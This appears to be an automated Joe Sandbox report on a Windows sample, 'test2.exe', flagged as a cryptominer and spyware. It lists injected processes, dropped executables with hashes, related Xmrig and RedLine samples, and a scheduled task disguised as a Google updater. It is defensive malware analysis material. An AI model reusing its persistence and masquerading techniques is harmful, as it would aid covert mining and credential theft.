https://ocsp.quovadisoffshore.com0 | powershell.exe, 00000010.00000002.4470351874.00000279285B0000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.5500369450.00000207AA061000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5695837277.00000207AA063000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5685416645.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434488974.00000207A9E59000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000002.5718187766.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000018.00000000.4446746638.000001F5DEE48000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000010.00000002.4452257806.0000027910271000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.microsof | lsass.exe, 00000016.00000000.4436179349.00000207AA156000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000003.4911486908.00000207AA156000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.pngXz | powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmp | false | 8%, Virustotal, Browse; Avira URL Cloud: safe | unknown
        No contacted IP infos
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1491606
        Start date and time:2024-08-12 15:33:43 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 10s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
        Number of analysed new started processes analysed:40
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:17
        Technologies:
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:test2.exe
        Detection:MAL
        Classification:mal100.spyw.evad.mine.winEXE@67/65@19/0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
        • Excluded domains from analysis (whitelisted): www.bing.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtEnumerateValueKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
09:35:43 | API Interceptor | 54x Sleep call for process: powershell.exe modified
09:36:17 | API Interceptor | 321274x Sleep call for process: winlogon.exe modified
09:36:18 | API Interceptor | 264249x Sleep call for process: lsass.exe modified
09:36:18 | API Interceptor | 1849145x Sleep call for process: svchost.exe modified
09:36:22 | API Interceptor | 236118x Sleep call for process: dwm.exe modified
09:36:24 | API Interceptor | 163803x Sleep call for process: IntelCpHDCPSvc.exe modified
09:36:28 | API Interceptor | 145898x Sleep call for process: IntelCpHeciSvc.exe modified
09:36:28 | API Interceptor | 163141x Sleep call for process: igfxCUIService.exe modified
09:36:29 | API Interceptor | 394052x Sleep call for process: dialer.exe modified
15:35:46 | Task Scheduler | Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
        No context
        No context
        No context
        No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files\Google\Libs\WR64.sys | test.exe | Get hash | malicious | Xmrig | Browse | -
- | 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe | Get hash | malicious | Amadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, Vidar | Browse | -
- | file.exe | Get hash | malicious | Xmrig | Browse | -
- | SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe | Get hash | malicious | Phorpiex, Xmrig | Browse | -
- | BlazeHack.exe | Get hash | malicious | PureLog Stealer, RedLine, Xmrig | Browse | -
- | CKHSihDX4S.exe | Get hash | malicious | RedLine, Xmrig | Browse | -
- | XXZahG4d9Z.exe | Get hash | malicious | RedLine, Xmrig | Browse | -
- | SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exe | Get hash | malicious | Xmrig | Browse | -
- | SecuriteInfo.com.FileRepMalware.2106.24143.exe | Get hash | malicious | Xmrig | Browse | -
- | SecuriteInfo.com.FileRepMalware.3253.21057.exe | Get hash | malicious | Xmrig | Browse | -
                            Process:C:\Users\user\Desktop\test2.exe
                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                            Category:dropped
                            Size (bytes):5986304
                            Entropy (8bit):7.663338824111387
                            Encrypted:false
                            SSDEEP:98304:4NShsPyXqeWGimFHC/Hxvz/IuiLx4bIu2x4c0FdTxJw7N:4lPISXmdC/RvDIuiLx4B2Sc073oN
                            MD5:80B97CC01243BE6495F5DF52BCDD6BDF
                            SHA1:5FE219BFDF8D6825130DCB5414BF05CC56899AF5
                            SHA-256:3E178F8B58D7C27AD58180FA75F779E2CF3B141EE3839F17BAD52D17FB0642DB
                            SHA-512:32DDA4F4432FE22BD91BD5849E7CD3D890A3C79C33B595DE38259584A8140E2865BC1789E64E30396B245CF93A26B5A9E669E01D8669101BBFCA768727C9F7F6
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: Virustotal, Detection: 55%, Browse
                            Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....T[..$.............@..............................[.....\][...`... ...............................................[.4.....[......0[...............[.0........................... .[.(.....................[.P............................text...............................`..`.data....,Y.......Y.................@....rdata...<....Z..>....Z.............@..@.pdata.......0[.......[.............@..@.xdata..<....P[......0[.............@..@.bss.....#...`[..........................idata..4.....[......@[.............@....CRT....`.....[......L[.............@....tls..........[......N[.............@....rsrc.........[......P[.............@....reloc..0.....[......T[.............@..B........................................................................................................................................................................
                            Process:C:\Program Files\Google\Chrome\updater.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):14544
                            Entropy (8bit):6.2660301556221185
                            Encrypted:false
                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                            MD5:0C0195C48B6B8582FA6F6373032118DA
                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 5%
                            • Antivirus: Virustotal, Detection: 4%, Browse
                            Joe Sandbox View:
                            • Filename: test.exe, Detection: malicious, Browse
                            • Filename: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Trojan.DownLoader46.2135.13298.13900.exe, Detection: malicious, Browse
                            • Filename: BlazeHack.exe, Detection: malicious, Browse
                            • Filename: CKHSihDX4S.exe, Detection: malicious, Browse
                            • Filename: XXZahG4d9Z.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.FileRepMalware.2106.24143.exe, Detection: malicious, Browse
                            • Filename: SecuriteInfo.com.FileRepMalware.3253.21057.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\test2.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):150528
                            Entropy (8bit):5.769203996328619
                            Encrypted:false
                            SSDEEP:3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
                            MD5:658AC2968AC81EADBE165CFD2A770C34
                            SHA1:39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
                            SHA-256:4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                            SHA-512:CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 87%
                            • Antivirus: Virustotal, Detection: 82%
                            Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.320643573359598
                            Encrypted:false
                            SSDEEP:192:d8V7IF0RuqHQOnbgpib8AtYl+HDJ86PL+2SSD2Czp0gy16ZcC0/oUhQXzQGKM32j:ihkyHQOLt5jR7zpR2y3GjM/TG6OtiY
                            MD5:84C15694ACA18C4415E3ABEEB7960C47
                            SHA1:10F2020D42ED7E35AAA2329E9C51488B3073387E
                            SHA-256:C299679DFFA8E597B0CF6FD89B73B79430282A1E6E04EF06B7A38BDEF33806C5
                            SHA-512:14A310E3A9905A321E425CB3D774857EA2955BBECBD0A7DBF97496E7EA229900734CAEAC2B82DE2A2F93A52E2D6CF3068CF28FDB3E2529FC7D7D805C2EEBC80D
                            Malicious:false
                            Preview:ElfChnk.u...............u...................Pw...y...&........................................................................P=................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...............................9...........................).......................**......u.........K.i........./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):89800
                            Entropy (8bit):4.201893718118441
                            Encrypted:false
                            SSDEEP:384:gVdLrVdTV5iV8VjVHV9GVVV4hDVVVUVdAVJVFVHV4VDVOVRVSVM2V9VeVzVtVWVQ:UfVVbVifVVlyeeQQ2VifVVT
                            MD5:6BE4D39D8F42AD5A3BAF2FC7A7C6602C
                            SHA1:A38EDCFD6AC8D9C2F356C3BF4DBFA68CA194C352
                            SHA-256:D67872DE2771A1F515E5B18DF3B7A327042AFE749B44736A9EA6375AF7560EC8
                            SHA-512:31543EC3FD8B06598A15609647578FFA07C29D8724510DD92FF33CAFF3739C39AE70288EE9D26C798C9062187583C7E97733211B1EAF5848F3350AEA0B6DEB59
                            Malicious:false
                            Preview:ElfChnk.o'.......'......o'.......'...........I...J..........................................................................]a..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**.......'.......j3........../X.P&...............................................................@.......X...a.!.....E..........@.j3......>7....W.>7........H....'...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....M.i....**.......'......h.k3........../X
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.384181986098426
                            Encrypted:false
                            SSDEEP:1536:Jzm3MmCrxxH4z4OFJ23KDi/OyazwNJCmikUoY:Q7Mwr
                            MD5:97D3FB02338DDB6FB1B571C200B1983B
                            SHA1:2A5D83ABA3BD3B9B3CA7367FD197219FCA4B8068
                            SHA-256:E260BB8BFFEEFD0F38F1C983BA81435431210D7355787CABDC4F59D3E1338828
                            SHA-512:BF2A841B4E77F9C248CD2B34C1A19A6A56DAC0738C3A731B570C1897913851147642A98A9043AA6E6C120E551E2C9BC08126747ADA192216FC4471B541EE17EC
                            Malicious:false
                            Preview:ElfChnk..'.......'.......'.......'...........................................................................................6................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...............#...................................................................**.......'......p$e.........../X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9345997974017255
                            Encrypted:false
                            SSDEEP:384:Vhm+iMNEi1itiXiYiAiQiCiYiXiviCiriMiKiYili+iciSiVciji/DiQisiKi7ik:V
                            MD5:2BCAEB26B4FC12BE9727E14C98A065A6
                            SHA1:51A46082019F896DB88915674AB8F4E5CDB32FBB
                            SHA-256:1A7096BF83783AAED4D2BD0123DCFF2DE61EAAAB72199C8DACAB08865C5DF7E4
                            SHA-512:5782CB1D88A7C41C90208C9DFF345838630D3768D9BF18E48A6E76FFE8701FBBA0E9A914034C8E08C89B799A08491AA889A63642BA7495F102020210B6987AF5
                            Malicious:false
                            Preview:ElfChnk.........(...............(............a..Pc.."..t.....................................................................l!............................................=...........................................................................................................................f...............?...................................b...........M...F...........................................................&.......................................................................................**..X..............w............>.&.........>..'.W.U2..9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.310249820592637
                            Encrypted:false
                            SSDEEP:1536:wkHsNnQw/nqUTbNXOf7PR2yWTTT3RC+OkmrHruL6RFHrbHIhLcJbEjfvNC+q9P3Y:wkMNnQw/nqUlXOf7PR2yWTTT3RC+OkmW
                            MD5:D096BE357F48740D8B3F4C4E2FC3C4AA
                            SHA1:DBE7E823E62097F7DAD5CF0B0A055BDEB60E802A
                            SHA-256:6E33C8218AD7FACA307C8704EB4CFE8F11B5272F196EBC50E7488E2BC9B24F93
                            SHA-512:8715FC934500983D4DBBADAF24904A61CF9E795411491D94904FA5B865F1B4E60F792EC336C0C0F38373C0D5778CC69D89A197F653B2A6422C5B1C9D022D8731
                            Malicious:false
                            Preview:ElfChnk.........0...............0..........................................................................................A..T................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................y...............&...................................................................................**...............pCW4........./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.209789619925081
                            Encrypted:false
                            SSDEEP:384:sh5pxpTpkpapApCkpCTpSpCrpCmZpCvpCXpCPpCipCm4pC0sp1pCspCnpApCzpCx:srJRkrIwoHg01RzsZrczv9ezTjlRp
                            MD5:BFAA8C3E0A4AEDF8609B8EAE3CC723B1
                            SHA1:EE2A70F15C857FFE78C1ED31B41E1BA76667E16E
                            SHA-256:40AABBEA5B7C5709939039F4C00EE2687B484E58AC79807E2ACEE1A216469DD7
                            SHA-512:CC8B9C61E024E2012C82D3AC18C4CA24FE6FC64DF39A2F4A24F9EB9787ED454DE424D3262719D4C3384D9B08164CA3691E06AE1E2E6BE2AD25646DB5593E2100
                            Malicious:false
                            Preview:ElfChnk.{...............{...................................................................................................v.Fu........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**......{.......}............./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.7122666366370487
                            Encrypted:false
                            SSDEEP:768:rBeqVzq0hiq1qB2YqRqhoqqqOYqGqGwqJqB:9p5
                            MD5:2005E1766DB566C345829A0615AF0490
                            SHA1:A5E66D682D62CCBABA4BE8A82B7B92C461874D96
                            SHA-256:79B51FFA0B6987D7EE0F8F2D7798E46B0F8DA45D15AD3536508C3E0E997763EE
                            SHA-512:0227E0E6E06504DFEDAFC4EBB6623F1200E66CB9968DEFD4298A1907431FF30980085D03262CC030C4EF9EF0A4C3FAC69110ED678DACE29EE470E34899C283E6
                            Malicious:false
                            Preview:ElfChnk......................................P...S..X.......................................................................sxW.........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................&........................................&..................................a...............................................**..............NIX.T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.4157864118318901
                            Encrypted:false
                            SSDEEP:384:5h5hTgzTgfNTgbTgdTglTgfTgJZTgfTg5TgGTgZTg:5FEYJUKu8iN0qp+
                            MD5:450759DF0038DC699F1A077F16FE743D
                            SHA1:38749387226451A069480C359793D3DF7C741EC9
                            SHA-256:CDBE979D2CC0D074914562C84F034558CE35930CE4CF22196718980531E0BE0C
                            SHA-512:A46E4900347B86A9583EFF2A6C0D7B03E138E7CC801C078E51F1FD130FF33D26196FC9940A8F6BB390AE87AECA1D858957FDE0D7FD58D09C095127677FF52FF2
                            Malicious:false
                            Preview:ElfChnk......................................@...F..............................................................................................D.......................l...=...........................................................................................................................f...............?...........................m...................M...F.......................&...........................................................................................................................**..P...........-..-T...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):92872
                            Entropy (8bit):2.8077602210251014
                            Encrypted:false
                            SSDEEP:384:RhuoS9VoryorOoroortorVorVorNorrmo4oruorlIoreorNorworgorDorhorcoq:RsWqGO4bsWqGO4
                            MD5:67C79A482679D1D216C459CC1F69267F
                            SHA1:35DD6753681E849F7F8A87B4C0735AD83341D942
                            SHA-256:B92C6AE723604D226E4FD3A65B70D0CC437819846B23FFA9C2E01568AF954D63
                            SHA-512:E6442FE21B57CBF05E4AE1C5D72787B0404B9F01D11DFBD3A3DB5D640ECFAD9BCAFBCA025E7EFB916684EA7497E60977C2AED225247985ABC7668D9C2D1E1C5B
                            Malicious:false
                            Preview:ElfChnk.........?...............?............h...j..S.68.....................................................................8).................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................Ef..............................**................@.S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.704381782007547
                            Encrypted:false
                            SSDEEP:768:we9GtXOmBKLbz4ILbBuzhFSbVKb0781JgUuXMtqwfgOZUpTH4Y3a6wzfjy2ieRLG:zzuzhF4lmfV
                            MD5:71DDD331F479C0EBBC1D736C0DA02E48
                            SHA1:36D6B3EF852F889EE8A5D59B242782A5D5C1B4CB
                            SHA-256:B4F93C7A45CDD4398BF409C817FF7C6C43E34ABC69A50E656B18C32206FA6735
                            SHA-512:93D7C5D312BB084B57881CCD2707C5C7B2CCD710C6035A342CE46D1E41E4270AE132C948E8E6B8D9E17A9BC2448828E0D667DE0BDD53FB713C5CBD076B633800
                            Malicious:false
                            Preview:ElfChnk.........g...............g....................RaG....................................................................-2O.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F................................6...............................'......................................m;..........................................**..................S...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.9776112875172112
                            Encrypted:false
                            SSDEEP:384:zhDCq2cCp1Cz2TCLqCM2CZCjiCsCblCnC/iCsCe5CECOwCFCkUCXCUoCjCtorCrp:zUEJ2
                            MD5:B398C9AB251DE811A7778C7A6143504B
                            SHA1:2F1822CFC7C355AADB9C7CDBFE1475A7E1803C16
                            SHA-256:64536BDA74AFE9478A65696793E213E5F14A58B0B92A9246C8A0315ED053496A
                            SHA-512:D68E001B5C6391B685B58AC10326120C043F2E2C031498088F1E8421A374B672690AE39962E0D443DF92ABBE8F42854EB4003D37A40BFAEDB93B96BABD6776E8
                            Malicious:false
